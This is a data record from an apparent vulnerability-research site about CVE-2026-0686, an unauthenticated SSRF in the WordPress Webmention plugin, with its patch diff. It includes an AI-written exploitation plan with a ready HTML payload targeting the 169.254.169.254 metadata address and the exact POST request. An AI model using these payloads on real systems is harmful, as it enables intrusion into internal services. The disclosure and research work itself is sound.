[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fl5J2gghSKEC70wYqp0IXHebKqa13KAeEPcxp29tO9hs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-0686","webmention-unauthenticated-blind-server-side-request-forgery","Webmention \u003C= 5.6.2 - Unauthenticated Blind Server-Side Request Forgery","The Webmention plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.6.2 in the 'MF2::parse_authorpage' function via the 'Receiver::post' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","webmention",null,"\u003C=5.6.2","5.7.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2026-04-01 19:17:15","2026-04-02 07:39:35",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F08d15c46-d15f-4803-80be-90bf33335c18?source=api-prod",1,[22,23,24,25,26,27],"includes\u002Fclass-avatar-store.php","includes\u002Fclass-comment-walker.php","includes\u002Fclass-tools.php","includes\u002Fhandler\u002Fclass-mf2.php","includes\u002Fhandler\u002Fclass-wp.php","readme.md","researched",false,3,"# Exploitation Research Plan: CVE-2026-0686 (Webmention SSRF)\n\n## 1. Vulnerability Summary\nThe **Webmention** plugin (versions \u003C= 5.6.2) is vulnerable to a Blind Server-Side Request Forgery (SSRF). The vulnerability exists because the plugin automatically fetches and processes remote URLs provided in Webmention \"source\" documents to extract metadata, specifically author avatars. \n\nWhen a Webmention is received, the plugin parses the source page for Microformats (MF2). If it identifies an author with a photo URL, the `Webmention\\Avatar_Store::store_avatar` function eventually triggers `Webmention\\Avatar_Store::sideload_avatar`, which calls the WordPress `download_url()` function on the provided photo URL without sufficient validation against internal or restricted IP addresses. This allows an unauthenticated attacker to force the server to make GET requests to arbitrary internal or external locations.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** The Webmention receiving endpoint. By default, this is often handled via the REST API or a query parameter.\n- **REST Route:** `POST \u002Fwp-json\u002Fwebmention\u002F1.0\u002Fendpoint` (Standard Webmention REST endpoint).\n- **Alternative Endpoint:** `POST \u002F?webmention=endpoint` (Legacy\u002Ffallback).\n- **Parameters:**\n    - `source`: URL of the attacker-controlled page containing MF2 markup.\n    - `target`: URL of a valid post\u002Fpage on the target WordPress site that accepts Webmentions.\n- **Authentication:** Unauthenticated. Webmentions are designed to be received from external, untrusted servers.\n- **Preconditions:**\n    - At least one post\u002Fpage must exist on the WordPress site.\n    - Webmentions must be enabled (usually enabled by default for posts).\n\n## 3. Code Flow\n1. **Entry Point:** A `POST` request is sent to the Webmention endpoint (e.g., `wp-json\u002Fwebmention\u002F1.0\u002Fendpoint`).\n2. **Reception:** The `Receiver::post` function (referenced in the CVE) handles the request, validating the `source` and `target`.\n3. **Parsing:** The plugin fetches the `source` URL and passes the response to `Webmention\\Handler\\MF2::parse`.\n4. **Metadata Extraction:** \n    - `MF2::parse` calls `MF2::get_representative_author`.\n    - `MF2::set_property_author` extracts the `photo` property from the author's h-card:\n      ```php\n      foreach ( array( ..., 'photo' ) as $prop ) {\n          $author[ $prop ] = $this->get_plaintext( $properties, $prop );\n      }\n      ```\n5. **Comment Creation:** A WordPress comment is created to represent the Webmention. The extracted author data (including the `photo` URL) is stored in comment metadata.\n6. **Triggering the Sink:** The `comment_post` action fires, triggering `Webmention\\Avatar_Store::init` -> `Webmention\\Avatar_Store::store_avatar`.\n7. **SSRF Execution:**\n    - `store_avatar` calls `Webmention\\Avatar_Store::sideload_avatar( $avatar, ... )`.\n    - `sideload_avatar` calls the vulnerable sink:\n      ```php\n      $file = download_url( $url, 300 ); \u002F\u002F $url is the attacker-controlled photo URL\n      ```\n    - `download_url()` (a WordPress core function) performs a GET request to the URL.\n\n## 4. Nonce Acquisition Strategy\nThe Webmention endpoint (`wp-json\u002Fwebmention\u002F1.0\u002Fendpoint`) **does not require a nonce** because it is a server-to-server communication protocol. The standard specification for Webmention explicitly avoids CSRF tokens for the reception endpoint to allow notifications from any external source.\n\n**Verification of Nonce-less Access:**\n1. Check the REST API registration (likely in `includes\u002Fclass-receiver.php`, though not provided).\n2. Standard Webmention implementations use `permission_callback => '__return_true'`.\n\n## 5. Exploitation Strategy\nThe goal is to force the WordPress server to request an internal resource (e.g., a metadata service or internal web app).\n\n### Step-by-Step Plan:\n1.  **Identify Target:** Find a valid post URL on the target site (e.g., `http:\u002F\u002Flocalhost:8080\u002F?p=1`).\n2.  **Prepare Malicious Source:** Create a publicly accessible HTML file (e.g., `exploit.html`) containing Microformats markup with an SSRF payload in the `u-photo` field.\n    ```html\n    \u003Cdiv class=\"h-entry\">\n      \u003Ca class=\"u-url\" href=\"http:\u002F\u002Fattacker.com\u002Fexploit.html\">Post Title\u003C\u002Fa>\n      \u003Cp class=\"p-content\">This is a test webmention.\u003C\u002Fp>\n      \u003Ca class=\"u-in-reply-to\" href=\"http:\u002F\u002Flocalhost:8080\u002F?p=1\">Target Post\u003C\u002Fa>\n      \u003Cdiv class=\"p-author h-card\">\n        \u003Cspan class=\"p-name\">Attacker\u003C\u002Fspan>\n        \u003C!-- SSRF TARGET BELOW -->\n        \u003Cimg class=\"u-photo\" src=\"http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F\" \u002F>\n      \u003C\u002Fdiv>\n    \u003C\u002Fdiv>\n    ```\n3.  **Send Webmention:** Use `http_request` to send a POST request to the Webmention endpoint.\n\n### Request Details:\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwebmention\u002F1.0\u002Fendpoint`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** `source=http:\u002F\u002Fattacker-controlled-site.com\u002Fexploit.html&target=http:\u002F\u002Flocalhost:8080\u002F?p=1`\n\n## 6. Test Data Setup\n1.  **Target Post:** Ensure a post exists.\n    ```bash\n    wp post create --post_type=post --post_title=\"Target Post\" --post_status=publish\n    ```\n2.  **Plugin Configuration:** Ensure Webmentions are enabled for posts (default behavior).\n3.  **Attacker Listener:** Use a tool like `nc -lvp 80` or a webhook listener if testing for basic SSRF, or target `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002F` to verify internal access.\n\n## 7. Expected Results\n- The plugin will respond with an HTTP `202 Accepted` or `200 OK` indicating the webmention is being processed.\n- The WordPress server will make an outbound HTTP GET request to the URL specified in the `u-photo` attribute (`http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F`).\n- If an internal listener is used, the listener will receive a request from the WordPress server's IP with a User-Agent like `WordPress\u002FX.X.X; http:\u002F\u002Flocalhost:8080`.\n\n## 8. Verification Steps\n1.  **Check Comment Meta:** After the request, verify if the comment was created and if the avatar URL was stored.\n    ```bash\n    wp comment list --number=1 --format=json\n    # Identify the comment ID, then check its meta:\n    wp comment meta get \u003CID> avatar\n    ```\n2.  **Verify Sideloading attempt:** Check the `wp-content\u002Fuploads\u002Fwebmention\u002Favatars\u002F` directory to see if the plugin attempted to save the result of the SSRF.\n    ```bash\n    ls -R \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fwebmention\u002F\n    ```\n3.  **Examine Access Logs:** Check the logs of the internal service being targeted to confirm the hit from the WordPress server.\n\n## 9. Alternative Approaches\n### Author Page SSRF (Blind)\nIf the `photo` property processing fails, the CVE also mentions `MF2::parse_authorpage`. This occurs when the `h-card` author is just a URL.\n1.  **Source Markup:**\n    ```html\n    \u003Cdiv class=\"h-entry\">\n       \u003Ca class=\"u-in-reply-to\" href=\"http:\u002F\u002Flocalhost:8080\u002F?p=1\">Target\u003C\u002Fa>\n       \u003Ca class=\"p-author\" href=\"http:\u002F\u002FINTERNAL-SERVICE:8080\u002Fapi\u002Fendpoint\">Author\u003C\u002Fa>\n    \u003C\u002Fdiv>\n    ```\n2.  **Effect:** The plugin may attempt to fetch the author's URL to find an `h-card` on that page, triggering a GET request to the internal service.\n\n### Avatar Metadata Trigger\nIf the `comment_post` hook is somehow avoided, editing the comment in the admin dashboard (if a moderator views it) might also trigger `Avatar_Store::store_avatar` via the `edit_comment` hook:\n```php\nadd_action( 'edit_comment', array( static::class, 'store_avatar' ), 20 );\n```","The Webmention plugin for WordPress is vulnerable to unauthenticated blind Server-Side Request Forgery (SSRF) when processing incoming webmentions. It fails to validate remote URLs before fetching them to extract author avatars or parse author pages, allowing an attacker to force the server to make requests to internal services or arbitrary external locations.","\u002F\u002F includes\u002Fhandler\u002Fclass-mf2.php line 875\npublic function parse_authorpage( $url ) {\n\t$response = Request::get( $url, false );\n\n\tif ( is_wp_error( $response ) ) {\n\t\treturn $response;\n\t}\n\n---\n\n\u002F\u002F includes\u002Fclass-avatar-store.php line 124\n\t\t\u002F\u002F Download Profile Picture and add as attachment\n\t\t$file = wp_get_image_editor( download_url( $url, 300 ) );\n\t\tif ( is_wp_error( $file ) ) {\n\t\t\treturn false;\n\t\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.6.2\u002Fincludes\u002Fclass-tools.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.7.0\u002Fincludes\u002Fclass-tools.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.6.2\u002Fincludes\u002Fclass-tools.php\t2025-12-18 20:53:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.7.0\u002Fincludes\u002Fclass-tools.php\t2026-03-30 17:18:46.000000000 +0000\n@@ -78,7 +78,7 @@\n \t\t$target = $request->get_param( 'target' );\n \t\t$mode   = $request->get_param( 'mode' );\n \n-\t\t$response = Request::get( $source, false );\n+\t\t$response = Request::get( $source );\n \n \t\tif ( is_wp_error( $response ) ) {\n \t\t\treturn $response;\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.6.2\u002Fincludes\u002Fhandler\u002Fclass-mf2.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.7.0\u002Fincludes\u002Fhandler\u002Fclass-mf2.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.6.2\u002Fincludes\u002Fhandler\u002Fclass-mf2.php\t2025-12-18 20:53:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebmention\u002F5.7.0\u002Fincludes\u002Fhandler\u002Fclass-mf2.php\t2026-03-30 17:18:46.000000000 +0000\n@@ -875,7 +875,7 @@\n \t * @return WP_Error|array Return error or author array if successful.\n \t *\u002F\n \tpublic function parse_authorpage( $url ) {\n-\t\t$response = Request::get( $url, false );\n+\t\t$response = Request::get( $url );\n \n \t\tif ( is_wp_error( $response ) ) {\n \t\t\treturn $response;","1. An attacker hosts a malicious HTML page containing Microformats 2 (MF2) markup (e.g., an h-entry with an h-card author).\n2. Inside the MF2 markup, the attacker specifies a URL to an internal or restricted resource (like AWS metadata services at 169.254.169.254) within the 'u-photo' property or the 'p-author' URL.\n3. The attacker identifies a public post on the target WordPress site that accepts Webmentions.\n4. The attacker sends an unauthenticated POST request to the Webmention REST API endpoint (typically \u002Fwp-json\u002Fwebmention\u002F1.0\u002Fendpoint) with 'source' set to their malicious page and 'target' set to the identified post.\n5. The plugin fetches the source page, parses the MF2 data, and automatically triggers an HTTP GET request to the attacker's internal target URL via the Avatar_Store::sideload_avatar function (using download_url) or the MF2::parse_authorpage function (using Request::get with security checks explicitly disabled).","gemini-3-flash-preview","2026-04-17 21:55:01","2026-04-17 21:55:55",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","5.6.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebmention\u002Ftags\u002F5.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwebmention.5.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebmention\u002Ftags\u002F5.7.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwebmention.5.7.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebmention\u002Ftags"]